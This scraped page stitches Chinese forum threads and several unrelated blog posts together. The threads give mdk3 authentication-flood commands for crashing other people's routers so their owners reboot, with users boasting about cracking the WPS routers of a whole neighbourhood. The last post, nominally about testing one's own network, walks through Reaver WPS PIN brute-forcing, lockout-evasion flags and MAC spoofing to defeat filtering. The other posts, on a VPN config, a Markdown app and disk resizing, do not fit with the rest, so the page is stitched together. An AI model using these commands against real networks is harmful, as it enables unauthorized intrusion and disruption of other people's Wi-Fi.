请问为什么mdk3攻击无效一点效果都没有 客户端照常上网!

关于路由器pin死的解决方案?(mdk3验证模式攻击!)的疑问?_百度知道pin导致路由器死掉的解决方法_wifi破解教学吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:34,925贴子:
pin导致路由器死掉的解决方法收藏
首先检测网卡:ifconfig -a然后模拟端口:airmon-ng start wlan0接下来用:airodump-ng mon0扫描ap找到你pin死的路由器mac用mdk3 做身份验证攻击mdk3 mon0 a -a mac(被pin死的路由器的mac)身份验证攻击效果说明:此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。说明:此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解。经测试此功能异常强大,但要慎用,不但会使被攻击的AP死机还会影响到其他可视范围内的AP。搞不好会把其他已经PJ的AP都搞瘫痪。废话少说首先进入CDlinux,打开水滴或者打气筒搜索pin死的MAC地址(直接打开水滴或者3070驱动搜索无线MAC地址然后点击左下角CDlnux图标,依次打开 无线安全--------mdk3-v6进入mdk3后输入命令mdk3 mon0 a -a 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)回车后进入攻击模式,时间不要太长,最多半分钟就可以关闭对话框然后重新扫描网络看pin死的路由是不是已经不在了。等待主人重启吧~~~快捷键 CTRL+C 停止攻击 然后继续输入命令攻击下一个特别注意:A.由于mdk3的功力太强,因此抓包完成后请立即按ctrl+C关 闭mdk3命令的执 行,以免影响周围无限网络,使信号质量变差B.此方法也适用与reaver一直重复一个pin情况,可以让客户端重启路由
盗墓笔记游戏出来了,你们都玩了么?
我攻击到百分之9的时候路由器,没关但是都不能上网,第二种情况是,路由器没关就我不能连接了,不能继续攻击
还等是pin死了出现这个状况后我点了停止,然后照你的第二张图片说的做,在按下回车后20秒关掉了对话框然后退出,重起虚拟机后,然后再打开minideg]p-gtk 点击扫描但是它还是出现了,选到我要拼的的那个点击Reaver后还是不能pin会出现第一张图那样,只有等重启路由器已经到90%前面4位已经出来了,但是这个pin百分之几就会pin死别人,重起后,你输入后四位开始pin又是pin到百分之几又pin死了,况且这不是那么容易让他重启路由器的。以前,前面4位没出来,道士可以陆陆续续的记录pin但是到了前面4位锁定了该怎么办?
pin着pin着就这样了
它的网速太诱人了,这就是他的网速,刚刚破解出来,后面4尾数需要记录,第二排和第三排
没有无线安全那个的说,请问露珠是什么版本的?
这个好像不怎么管用
攻击基本不出什么效果的
不错,确实可以使对方路由掉线,前4位用打气筒破解出来了,后四位加入参数n好不容易破解快完成了,pin到99.99%我想是漏码了,用水滴加入参数n只能 pin几下就会pin死,我想如果使用抓包,必须使用两台笔记本台式电脑和两个无线网卡,一个抓包,一个用上面的方法攻击掉线,抓取握手包
今天用水滴加参数n重新跑前4位,足足用了跑了5个小时,将难pin的水星路由跑出pin码和密码,密码是一个手机号码,小区里所有的开wpc的路由一个都不留全部破解
楼主的方法真是厉害,昨天上午破解到30%就死了,用了你的方法,晚上他就重启了路由器,昨天晚上搞定了,谢谢楼主
我按照你的教程做不行呀?为什么,提示说没有此设备
楼主我这算pin死了吗?      --看到楼主这么没节操的帖子,说真的,我和我的小伙伴们都决定放弃治疗了!
为什么我的CDlinux里面没有无线安全这个选项呢难道被切鸡鸡了
楼主,我的无线安全里怎么没有mdk3v6啊
对方路由器是“水星MW310R“。 使用mdk3 mon0 a -a 他的MAC地址,没用啊。 不论电脑还是手机,都能收到他的AP。
赞   --来自助手版贴吧客户端
我攻击好半天依然可扫描出来?但变成了未设置安全机制网络
我攻击好半天依然可扫描出来?但变成了未设置安全机制网络
我攻击好半天依然可扫描出来?但变成了未设置安全机制网络
面对腾达的漏油器,海啸也没用
能把镜像发给我么
要是攻击无效怎么办,路由器把Mac给过滤了
登录百度帐号推荐应用
为兴趣而生,贴吧更懂你。或推荐这篇日记的豆列
······后使用快捷导航没有帐号?
后使用快捷导航没有帐号?
上尉, 积分 1338, 距离下一级还需 663 积分
签到天数: 3 天[LV.2]偶尔看看I
后面加个800更爽
少将, 积分 44475, 距离下一级还需 15526 积分
签到天数: 188 天[LV.7]常住居民III
本帖最后由 wm906wm 于
10:14 编辑 &&U* B% r1 \% q& E% i
1 D0 X# X0 g* v( V* @2 Z
你在攻击谁啊!
我用的不太多,但攻击一次成功一次!
貌似你这参数有问题,把你挡住的那个,后面那张图发出来看看!
少校, 积分 4469, 距离下一级还需 532 积分
签到天数: 419 天[LV.9]以坛为家II
希望高手指点
中校, 积分 7832, 距离下一级还需 2169 积分
签到天数: 585 天[LV.9]以坛为家II
到底怎么用啊麻烦了请弄明白后发给我一份好吗 具体的操作方法
少校, 积分 2193, 距离下一级还需 2808 积分
签到天数: 179 天[LV.7]常住居民III
byy 发表于
mdk3 mon0 a -a ap的MAC
用这个命令就好使啊!% S. q! T. _9 n- K% g0 [" [) K8 C
屡试不爽!) y' B0 p4 f: [7 x/ V/ D3 q
俺就是用的这个命令,对自己的路由器和人家的路由器都是一样的。我自己的路由器照上网不误。我自己的防火墙有没有开呀。
少校, 积分 3019, 距离下一级还需 1982 积分
签到天数: 68 天[LV.6]常住居民II
rendaoju 发表于
15:41 ' s2 ^9 q% l1 _' J. k&&W& \+ T
俺就是用的这个命令,对自己的路由器和人家的路由器都是一样的。我自己的路由器照上网不误。我自己的防火 ..., F9 Q! x1 {1 W1 N&&g; S
我也是啊! 可是楼主就是不行 你说是不是 RP 的问题!!
少校, 积分 2193, 距离下一级还需 2808 积分
签到天数: 179 天[LV.7]常住居民III
love香 发表于
04:49 : ]. |% i- F5 l+ M+ F- ~8 ]&&R+ O
有用的,但必须是路由器没有开启防火墙。5 l: x0 L/ R. w&&C& Y&&N6 r5 X8 r6 ]
我自己的路由器确认没有开启防火墙。看我的图片应该是命令也发出去了,在攻击,但是就是无效呀。
少校, 积分 2193, 距离下一级还需 2808 积分
签到天数: 179 天[LV.7]常住居民III
wm906wm 发表于
你在攻击谁啊!
我用的不太多,但攻击一次成功一次!* @8 G&&[' h) V& m
貌似你这参数有问题,把你挡住的那个,后面那张图发 ...- d4 G3 D9 {) f- U% D7 D
我攻击人家的不起作用,就拿我自己的路由器做实验,用的是cdlinux 集成的mdk3-v6,貌似在攻击,就是不起作用,我路由器台式机和手机照样连接上网。
少将, 积分 44475, 距离下一级还需 15526 积分
签到天数: 188 天[LV.7]常住居民III
本帖最后由 wm906wm 于
17:17 编辑 5 }&&}/ o: n2 ]
rendaoju 发表于
15:46 / g5 f9 g2 i2 Z) x2 z&&X7 F
我攻击人家的不起作用,就拿我自己的路由器做实验,用的是cdlinux 集成的mdk3-v6,貌似在攻击,就是不起作 ...
你用命令启动你的网卡了吗?没启动,你白攻击!
启动网卡命令:
airmon-ng start wlan02 T: U4 U2 j% A: O! x: B, N2 q
之后看有无网卡启动的提示:" x7 i+ z5 a2 k" o
mon0……& &……& &+ }, [&&L1 {" b! J
mon1……& &……5 n5 J) {. q$ G2 Y
如果没有看到这提示,说明你网卡启动不成功!. ^9 h! U9 S( M3 W5 o2 B
* x3 A/ A8 @0 @# `" [
如果启动了,你再用攻击命令:mdk3 mon0 a -a MAC(要攻击的mac地址,注意大写)
另外,以我的经验:一般攻击包的数据到10000,就可以停止了,用ctrl+c暂停,再扫描看看路由是否还在,如果还在,再输入命令重复攻击一次,一般2次就解决掉了!
, g&&n' n5 w9 O# ]4 }
0 V$ l: G&&E4 j4 A# H' F# `
上尉, 积分 1629, 距离下一级还需 372 积分
签到天数: 144 天[LV.7]常住居民III
byy 发表于
09:05 0 `, Q3 d9 R% A' ~- o
mdk3 mon0 a -a ap的MAC7 c) ^8 H1 L& Z
用这个命令就好使啊!
屡试不爽!
这个命令没错 而却是有效果的、这个我却定&&当你抓包的时候 会开一个窗口&&同时使用这个命令的时候 服务端马上就会有反应 不过我认为 这个命令使用还是有前提的 就是必须路由侧也必须有客户端连接
上尉, 积分 1629, 距离下一级还需 372 积分
签到天数: 144 天[LV.7]常住居民III
还有一个也是有用的&&W* e% N# S8 Z7 ?3 O
& B7 S0 i7 _. `( U# {1 b2 i, Z5 q
/ k3 \. X" |/ H- J$ `) z
sudo mdk3 mon0 d -m -mac -c 通道
中尉, 积分 520, 距离下一级还需 481 积分
该用户从未签到
mdk3攻击是看运气的,不是百分百能成功,但这个确实有用,我正在折腾的路由有三个能干掉,其他五个,PIN死了,只能等机主自己重启,保存每次pin的数字,用本记下来,或保存wpc文件.
Powered by莓玩没了(TM)Body:Title:+-AMain:AText:+-Create account to save changesclose轻击着键盘,咀嚼着思维,在茶香中书写着自己,我非文人亦非周树人的看客,只是芸芸众生中一个与众不同的猥琐大叔。…MWeb - Pro Markdown writing, note taking and static blog generator AppPublished: March 21,
2015 | 22:29 Pro Markdown writing Minimal UI, Dark Mode, optimized lists indent,five editor themes. Markdown syntax and massive Markdown extensions Supported: Table, TOC, MathJax, Fenced code block and code syntax highlight, Task lists, Sequence & Flow chart, Footnote and more.Typewriter Scrolling: View - Typewriter ScrollingPublish/Update to Wordpress, Metaweblog API services, , Evernote, 印象笔记, Blogger, Scriptogr.am, Tumblr. Preferences -
Publishing to add publishing services. Click top-right corner Share Button for publishing.Support six live preview themes. Easy to custom preview theme. All themes can export to HTML or PDF. To open live preview window, please press CMD + R or CMD + 4. Support Outline view. External Mode and Library Mode External Mode (CMD + E): This mode design for create, open external Markdown document. You can add external folder to this mode.Library Mode (CMD + L): This mode design for note taking and static blog/website generator.
Shortcuts CMD + E or View - Open External to open External Mode. Shortcuts CMD + L or View - Open Library to open Library Mode. External&s folder and Library documents are supported Full Text Search, drag & drop or paste photos to the editor and display. CMD + V paste to JPG pictrue, CMD + Shift + V paste to PNG pictrue. Library Mode for note taking Library Mode use categories tree to organize documents, support drag & drop or paste insert pictrue and display immediately. Support import external Markdown or txt document to the library, export a category or documents to HTML, PDF or Markdown. More info, please check this post:
Library Mode for static blog generator You can build static blog One Click! Now has two blog themes, it&s easy to custom you owner blog theme. you can add
code for share and comment support to you blog. You can enable MathJax and Sequence & Flow chart support in category setting. More info, please check this post: Source:
0.8.5 使用Published: October 06,
2014 | 17:05 *注1:本文不包含ocserv的编译、安装,请自行研习*注2:本文将包含ocserv的证书认证配置,不包含pam (radius)认证*注3:本文将包含win,mac 端的使用,移动端相对简单,不做介绍ocserv是OpenConnect SERVer的缩写,基本上就是cisco anyyconnect的开源兼容服务器软件,好处就是这个软件使用的是SSL VPN方式,通常会用DTLS这一层,支持服务器端推送32条路由,实现国内国外按需区分路由;同时各种客户端会长连接方式,一直后台待命,省时省电。我就不废话了。我的配置是采用了全证书的方式进行,因此不需要用户名密码,如果您要对客户端进行限制,计时方面可以采用证书有效时间;流量限制方面可以使用iptables针对IP进行限制;同时在线人数上如果是多台服务器的话,相互间无法限制(cookie/session分布于不同服务器),如果仅一台服务器话就可以在配置文件搞定。我的完全配置如下,如果你要复制配置文件可以到:#第一行用以指定认证方式,我是证书auth = "certificate"#Added @05-10-2014#加入这个后就可以使用occtl了#occtl reload && occtl stop nowuse-occtl = trueocctl-socket-file = /var/run/occtl.socket# seccomp default : true#关闭这个可以提高性能,牺牲一丁点安全,更可以避免无法启动的情况(遇到过的都知道那痛苦)use-seccomp = false#listen-host = 0.0.0.0#最大客户端数量,根据你的服务器IP地址分配多少以及性能设置,自用的话不必很大max-clients = 36#这个看英文就知道意思了,你可以加以限制max-same-clients = 4tcp-port = 443udp-port = 443keepalive = 32400dpd = 60mobile-dpd = 1800#故意为空mobile-idle-timeout =deny-roaming = false#这个MTU选项一定要打开try-mtu-discovery = trueserver-cert = server-cert.pemserver-key = server-key.pemca-cert = ca-cert.pemtls-priorities = "NORMAL:%SERVER_PRECEDENCE:%COMPAT"auth-timeout = 40rekey-time = 172800rekey-method = ssluse-utmp = truepid-file = /var/run/ocserv.pidsocket-file = /var/run/ocserv-socket#下面这个profile是预置用户文件,可以实现按需或者多个VPN网址自动陈列配置user-profile = /usr/local/etc/ocserv/profile.xmlrun-as-user = nobodyrun-as-group = nogroup#这个优先级,我设定为5,一共是0-6优先级,可以在网络传输时优先传递,也支持TOS方式的16进制net-priority = 5cgroup = "cpuset,cpu:test"#设备名称,你可以自己写一个名字device = CiscoSSL#这个是关于无用IP地址如何回收的predictable-ips = truedefault-domain = 你的默认域名(与你的证书里的一定要一样,否则奇葩bug)ipv4-network = 192.168.100.1ipv4-netmask = 255.255.255.0dns = 208.67.222.222ping-leases = falsecisco-client-compat = true#这下面是以route = 开头的自定义路由,以实现路由自动区分我省掉了,同样可以在github上下载我慢慢调整好的路由。#&在启动ocserv之前,我们需要有自己的证书以及发给客户的证书,这将包括根证书系列、服务器证书系列、客户证书系列,既然已经安装了ocserv那就一定安装了gnutls的certtool则生成证书就可以用我的模板来进行:请看清以上链接中的4个文件,一个是ca.tmpl模板,用以生成根证书;一个是server.tmpl用以生成服务器证书;另一个是client.tmpl用以生成客户端证书的模板;最重要的是 cert-client.sh,这是一个脚本,以后你的朋友如果跟你要VPN服务器用,你就可以直接 ./cert-client.sh friend,这样就全自动生成你朋友的一个单独证书,并且打包成 *.p12格式,并且会等待让你输入证书的密码,这个密码是必须的,否则在iOS上是无法导入的,切记。请分别下载以上4个文件,并将其中的@abc.org改成你自己的网址,然后就可以自行签发了:首先生成CA根证书:certtool --generate-privkey --outfile ca-key.pem&certtool --generate-self-signed --load-privkey ca-key.pem --template ca.tmpl --outfile ca-cert.pem&接着生成服务器证书:certtool --generate-privkey --outfile server-key.pem&&certtool --generate-certificate --load-privkey server-key.pem --load-ca-certificate ca-cert.pem --load-ca-privkey ca-key.pem --template server.tmpl --outfile server-cert.pem接下来是给客户签发证书,前面的脚本就有作用了,以后你会经常使用这个脚本,极其简单:./cert-client.sh 你想要指定的文件名称然后你输入一个密码后,就会生成三个文件 *-key.pem, *-cert.pem, *.cert.p12,大多数平台都只需要最后一个文件 ,同样在其他地方导入这个文件时,也需要输入密码(你在生成时输入的那个)。证书我默认是10年的有效期,基本上如果我能力足够的话我会一直持续提供服务,你自己可以定义一个短的,至于要取消一个证书,就需要用到 revoke,这个你参考一下就可以了:$ cat && _EOF_ &crl.tmpl&crl_next_update = 9999&crl_number = 1&_EOF_&$ cat user-cert.pem &&revoked.pem&$ certtool --generate-crl --load-ca-privkey ca-key.pem --load-ca-certificate ca.pem --load-certificate revoked.pem --template crl.tmpl --outfile crl.pem接下来就是如何在客户端使用了,本来这东西要使用是非常简单地,可是麻烦是在于客户端思科是不开放的!不过好心的我还是会放出下载的,例如:mac os x&http://ftp.rrzn.uni-hannover.de/pub/local/anyconnect/anyconnect-macosx-i386-3.1.05182-k9.dmgwindows&https://ftp.rush.edu/users/vpn-client/anyconnect-win-3.1.05182-pre-deploy-k9.msiLinux可以使用openconnect。win下证书导入如果是win8,直接以管理员身份打开 *.cert.p12,导入;如果导入后发现不能用,那就跟win7一样来操作1 打开 mmc,然后按ctrl+M 出现功能单元选择,找到证书,然后点添加,就会看到下图然后在windows上就可以直接连接了。没啥特别的。mac osx 有点特别:Source: 如何在黑莓blackberry 10上安装skypePublished: August 28,
2014 | 14:38 ?如果你去微软的网站看,看不到skype是否支持BB10。上网搜估计都困难,世界上它就静静地待在app world里。要下载它,首先,你需要一个VPN!而且要是国外的。其次,一定要连接WIFI,不能用手机网络。最后,关闭手机移动网络,使用WIFI开VPN,然后畅游blackberry app world 。发送自我的 BlackBerry 10 智能手机。Source: 不重装无损扩展(调节)Debian分区容量Published: March 02,
2014 | 15:03 在安装Debian时,由于预计错了将来要使用的容量,因此编译文件时提示容量不够了,这可极坏了我,搜索网络发现,没有好的解决办法。因此就想捣鼓一下无损容量扩充。条件:&1 VMWare 虚拟机 10G 磁盘2 Debian 7.0&3 所有文件都在一个分区(也就是说/home , /var ,统统都是在 / )
4 &要求无损扩充成20G磁盘解决方法:1 如果你使用了Windows + Deiban 的方式,那么这个方法也同样适合你,无非你就是要从Windows里割掉一块容量,再到Debian下扩展2 首先使用VMWare 来对虚拟机进行扩展磁盘,这个操作在VMWare7 以后很方便啦,只要在虚拟机设置里点击磁盘,会有一个扩展的选项。(需要关闭虚拟机电源)
3 进入Debian,使用 fdisk -l 可以看到 /dev/sda 由10G已经变成了20G,但是看下面的分区还都是使用的10G时的结构。4 接下来我们要将现在的所有分区统统删除,然后重新分区。不必担心统统删除分区会导致系统无法启动,因为我们改动的只是分区表而已。fdisk /dev/sda
m (显示菜单,对应 menu)p &(显示当前的分区信息,注意看/dev/sda1 /dev/sda5,这些数字,一会要用)d &(删除开始,输入d,然后输入要删除的数字,我自己是要全部删除)p &(显示修改后的分区,应该是空的才对)n &(新建分区,对应New)然后就是一路回车选择默认,就是全部磁盘。
p &(再次显示磁盘分区是否就是自己想要的)w &(最后使用w保存)q &(退出fdisk)这就OK啦,分区调整结束。其实上面的操作也适合你/home /var /tmp等等在不同分区的情况,只是稍微有点差别。同时,你也可以用来减小你的分区,无非就是在输入 n (新建)时调整一下而已。5 如果这个时候,你按照系统的提示,重新启动,其实我们的操作室完全没有生效的,容量依然没有增加。因此我们就要用到一个脚本:
/etc/init.d/resize2fs_onec&#!/bin/sh### BEGIN INIT INFO# Provides: & & & & &resize2fs_once# Required-Start:
# Required-Stop:# Default-Start: 2 3 4 5 S# Default-Stop:# Short-Description: Resize the root filesystem to fill partition# Description:### END INIT INFO
. /lib/lsb/init-functionscase &$1& in& start)& & log_daemon_msg &Starting resize2fs_once& &&& & resize2fs /dev/root &&
& & rm /etc/init.d/resize2fs_once &&& & update-rc.d resize2fs_once remove &&& & log_end_msg $?& & ;;& *)& & echo &Usage: $0 start& &&2
& & exit 3& & ;;esac注意上面的红色字体,要指明你要重新分配的磁盘节点,我是要整个调整,所以我就是 /dev/root 啦。你可以再 df -h 中查看你使用的是哪个节点。然后这还不够,还要赋予脚本启动权限和可执行权限。
chmod 777 /etc/init.d/resize2fs_onceupdate-rc.d resize2fs_once defaults#不用担心,这个脚本启动后就自动删除啦。6 OK,现在重启系统,应该发现你的磁盘已经容量有调整了,而且Debian还不需要重装。
Source: 用Raspberry Pi检测自己的无线网络安全Published: May 13,
2013 | 13:14 "实际上本文适用于其他Linux/Unix-like 系统“著作本文之目的是在于学习和探测自己的无线网络安全,如使用于其他目的皆与我无关,安全是双刃剑,可守亦可攻。通常我们都会使用家庭无线路由,使得无线设备可以连网,但是隔墙有耳,无线的特性也决定了他人可以进行连接,因此我们需要诊断自己的无线是否安全。传统上,我们使用pc,装个CDLinux或者Benni,再或者巨无霸级别的BlackTrack,这会占用一台PC,并且不得不忍受睡前检测自己安全,睡醒后检测到一半,然后要关机切换回工作系统。所以今天的目的就是要让你摆脱束缚,使用Raspberry Pi作为无线检测基地,24小时自动帮你检查你的无线安全性,文章会涉及Raspberry Pi下安装使用Reaver和Aircrack-ng,以及在WPS PIN时的一些问题,另外涉及到跑包解码部分会在后续补全。下面就开始说一下:检测目的:检测自己家的无线安全性检测手段:WPS 计算、WPA-PSK反解、匿名攻击检测平台:& & & & & & && & & & & & & 1 &Raspberry Pi &512M/256M& & & & & & & 2 &2张 USB WIFI Card,我的 AR9721 芯片和Realtek任意网卡& & & & & & & 3 &Raspbian OS检测步骤:一 软件的准备1 Aircrack-ng&wget&tar zxvf&但是这个地址似乎被国家防火墙给OOXX,你需要想点办法才可以。apt-get install -y libpcap-dev libsqlite3-dev sqlite3 libpcap0.8-dev libssl-dev build-essential iw tsharkcd&.1vi common.mak在最后几行看到如下CFLAGS&&&&&&&&& ?= -g -W -Wall&-Werror&-O3删除 "-Werror",否则编译会不通过保存后退出,然后make && sudo make install2 Reaver 1.4wget&tar zxvf reaver-1.4.tar.gzcd&&reaver-1.4/src./configure && make && sudo make install3 [非必须软件] macchangersudo apt-get insall -y macchanger作用是保护我们自己,更改我们自己的网卡MAC。另外一个用途是,我们的无线路由有MAC地址绑定,我们改成它正常客户端的MAC就可以进行探测二 无线网卡的选择要检测无线安全性,必须要求无线网卡能进入混杂模式,这种模式可以接受所有的无线信号,符合这种要求的网卡一般都是有特定芯片。例如常见的所谓 8187网卡等等,我这里选用的是&Atheros 9271 ,原因有两点:1&Atheros 92XX 芯片性能不错,Apple Mac Book Air / Pro 之前就是&Atheros 9280,而我的笔记本也是 AR9280。这网卡的好处不单可以接收无线信号,还可以做热点,将接收的无线网路再次分发,也就是说电脑就能实现无线桥接。2 驱动简单,无bug。Raspberry Pi系统就有 AR 9XXX 的驱动,插上网卡就可以驱动,也没有兼容问题。另外,我在硬件需求里,也提到过要2张USB网卡,其中一个必须是可以进入混杂模式的无线网卡(本例中是&Atheros 9271),另一张就随便一个便宜的无线网卡,属于非必须,原因是这第二张无线网卡仅仅是提供给我们远程连接用的。我想你更希望,一边用AirPlay在RaspBerry Pi上看高清,一边让它后台帮你侦测安全,第二张网卡的作用就是AirPlay用和远程控制用,你也可以使用自带的有线网卡。在这一节,除了要购买好网卡外,插入到raspberry后,你还需要注意无线网卡是哪一个名称,例如我的&ifconfig -a&eth0: .........................................................wlan0 : ..........................................................wlan1:...................................Linux不太好的地方是,对驱动使用通用名称而非显示驱动名称,所以你只能看看Mac 地址来区分wlan0 wlan1各自对应,或者你拔掉一个网卡,看看序号变化。另外也可使用命令 " lsusb "来看看。不在今天的讨论之内。这里假定: wlan0 是用于ssh 连接,进行远程控制的网卡; wlan1 对应&Atheros 9271网卡,用了进行安全侦听。三 检测无线安全1 扫描无线网路废话一句:最好你能 apt-get install screen ,这样你就可以在关闭远程连接时,RaspBerry Pi继续工作,此软件为非必须。由于我将raspberry打开了root用户,所以我直接使用root操作,如果你也想减少麻烦,建议也直接切换到root (可以先在普通用户模式下 sudo passwd root ,给root改密码,然后你就可以直接 " su - &",切换)。1) 命令airmon-ng start wlan1这将会产生一个新的网络接口 &mon0 , 这表示要在wlan1上开始无线侦听啦,这时你可以通过 mon0 接受周围任何无线数据包。2) 命令airodump-ng mon0将会得到一个列表(这张列表其实还有后半部分,未列出)CH& 3 ][ Elapsed: 23 mins ][
22:35&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&BSSID&&&&&&&&&&&&& PWR& Beacons&&& #Data, #/s& CH& MB&& ENC& CIPHER AUTH ESSID&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&18:64:C7:1E:2E:6f &-70&&&& 1519&&&&&& 19&&& 0& 11& 54&& WPA2 CCMP&& PSK& China17:E6:E4:F2:32:B6 &-75&&&&&& 70&&&&&& 85&&& 0&& 6 &54e. WPA2 CCMP&& PSK& steve8a:21:0A:9C:D9:57 &-78&&&&& 451&&&&&&& 1&&& 0&& 6 &54e WPA2 CCMP&& MGT& MERCU8c:E8:73:31:56:99 &-81&&&&& 442&&&&&&& 1&&& 0&& 6& 54e. WPA2 CCMP&& PSK& xiux98:83:45:4A:FE:66& -83&&&&& 526&&&&& 230&&& 0&& 6& 54e. WPA2 CCMP&& PSK& Re注意看这张列表,列表中显示了你周边无线的相关信息。注意看 MB 这一列,显示为" 54 "、"54e. "等等,这表示了无线当前的速率模式以及WPS开启状况,我自己的路由器是 "steve",注意看,”54e“和” 54e. “是不同的,多了一个 点,这个点表示开启了 wps模式。所以我们下面就进行wps的探测,在这里我们要记住SSID对应的MAC地址,此后我们会针对MAC地址进行攻击和探测。或者,你额外进行一个操作,扫描 wps 专用命令 &wash :&wash -i mon0 -n 5 -C -s这表示使用 mon0 界面监听周围wps信号,对每个无线点进行5个包探测, -C 表示忽略存在错误包的频道, -s 就是扫描 scan。会得到如下:root@xbmc:/home/pi# wash -i mon0 -n 5 -C -sWash v1.4 WiFi Protected Setup Scan ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner &&BSSID&&&&&&&&&&&&&&&&& Channel&&&&&& RSSI&&&&&& WPS Version&&&&&& WPS Locked&&&&&&& ESSID---------------------------------------------------------------------------------------------------------------3C:D1:77:3E:79:5c & & & 1&&&&&&&&&&& -62&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& JasomaC:63:BF:75:80:7b & & & 1&&&&&&&&&&& -63&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& MERCURYa8:61:BF:75:80:33 & & & 1&&&&&&&&&&& -62&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& MERCURY78:83:45:4A:FE:ae & & & 6&&&&&&&&&&& -74&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& RemcC:E8:73:31:56:5f & & & 6&&&&&&&&&&& -82&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& xiubC:17:2F:41:99:F8 & & & 6&&&&&&&&&&& -82&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& TP-LINK_58:64:C7:1E:2E:b2 & & &11&&&&&&&&&&& -77&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& ChinaNet-d2:54:99:55:A7:e9 & & &11&&&&&&&&&&& -72&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& ChinaNet-eC:21:0A:9C:D9:c5 & & & 6&&&&&&&&&&& -79&&&&&&& 1.0&&&&&&&&&&&&&& No&&&&&&&&&&&&&&& MERCURY_这样就一目了然的看到 WPS 那里都是 1.0,而且WPS Locked 是NO。这就是我们接下来要做的事情了。3)WPS 探测破解3.1) &记住:保护自己,在操作前,使用 macchanger 或者系统自带的ifconfig。macchanger -m aa:bb:cc:dd:ee:ff wlan1&命令的意思是,强制更改wlan1的MAC地址为&aa:bb:cc:dd:ee:ff ,如果路由器限制了MAC,你就将此处的MAC改成可以正常访问的。有mac限制的wifi通常都是由自己客户端连接的,因此你要有耐心使用&airodump-ng mon0 (也即是上面 2种提到)去看底下的客户端列表。因此路由器限定MAC并不安全。你也可能喜欢macchanger -r wlan1&这表示把wlan1 改成随机的MAC,这样就不担心路由器的封锁。3.2) 接下来正式开始破解WPS的PIN从reaver -i mon0 &-b 00:01:02:03:04:05 -vv -S -a&其中 -b 后面的MAC就是你要破解的无线的MAC,然后你就可以让raspberry自己搞定。-vv 是查看详细信息的,等你熟练了之后,你就可以使用 -v ,这样就简单了。通常,遇到问题才会使用 -vv 。得到下面:Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner &&[+] Restored previous session[+] Waiting for beacon from 18:17:2F:54:87:f3[+] Associated with EC:17:2F:54:87:7C (ESSID: Steve)[+] Trying pin [+] Trying pin [+] Trying pin [+] Trying pin [+] Trying pin [+] Trying pin [+] 90.95% complete @
20:52:06 (8 seconds/pin)[+] Trying pin [+] Trying pin [+] Trying pin [+] Trying pin 3.4)可能遇到的问题如果只是几条命令这么简单,可能我这文章与其他人就无异了,这里要说的是探测过程中可能遇到的状况。a. &reaver 命令出错中断了,我的破解进度怎么办这个你不用担心,reaver是实时保存进度到 /usr/local/etc/reaver/ 目录下,如果你查看你会发现文件使用 mac地址.wpc 格式存放,下一次你只要是针对此mac的破解将会自动读取该文档,所以你可以在任何时候中断。b. reaver 提示” Failed&Associated with XX:XX:XX:XX:XX:XX "这表示你无法连接到所选的wifi ,可能是信号问题,可能是对方被你给PIN死了,也可能是对方限制了MAC地址。解决方案:*针对信号,这个神都解决不了,除非换天线*路由PIN死了,但是可能路由上网还通,因此你虽然连接不上,但是不影响原来已经连接的。所以这种情况就要使用大招: mdk3 攻击,强制使路由器处于假死,迫使主人重启路由器。至于mdk3的使用,你可以跳到文章后面阅读,或者本页搜索 mdk3攻击 。*对方限制了MAC地址,这个我在前面macchanger中已经提到,HOHO有备而来哟。c. reaver 破解到 99.99%以后就无限循环了这个问题比较复杂,多半是因为漏PIN了 ,网络上流传可以使用 -n 来解决,但是也不尽然,如果PIN的时候网络不好,你PIN了一组数字,结果服务器不回复,reaver就认为那组数字是错误的,实际上是因为你和路由间信号不好导致回复丢失了。。。。。首先,如果你不幸到了99.99%无限循环,那就要去手动修改 /usr/local/etc/reaver/mac地址.wpc,可以看前三行,修改第二行为000,强制重新从90%开始计算。关于wpc文件,将会在后面进行解释。如果你仅仅是临时测试PIN进度,可以使用&reaver -i mon0 &-b 00:01:02:03:04:05 -vv -n&-a -p 5463此处5463是你99.99%循环时那组数字的前四位。这个临时模式的破解进度是无法保存的,需要注意。如果需要实时保存进度,只能修改上面提到的wpc文件。其次,使用 -vv 看看有没有出错,例如我发现我的就一直提示:[!] WPS transaction failed (code: 0x03), re-trying last pin或者&[!] WPS transaction failed (code: 0x02), re-trying last pin这或许因为对方路由器限定了PIN的次数,过于频繁就会拒绝我们的探测,因此我们修改一下参数:reaver -i mon0 &-b 00:01:02:03:04:05 -vv -S -N -L -d 60 -r 3:15 -T .5 -x 360好吧,这下参数变长了好多,其实很简单:-L 就是忽略路由锁定-d 60 就是发一次等1分钟,降低我们的探测频率,这相当有用,尽管速度降了下来但是更精准了。-r 3:15是一个PIN失败后尝试3次,每次间隔15秒。-T .5 默认是 0.1 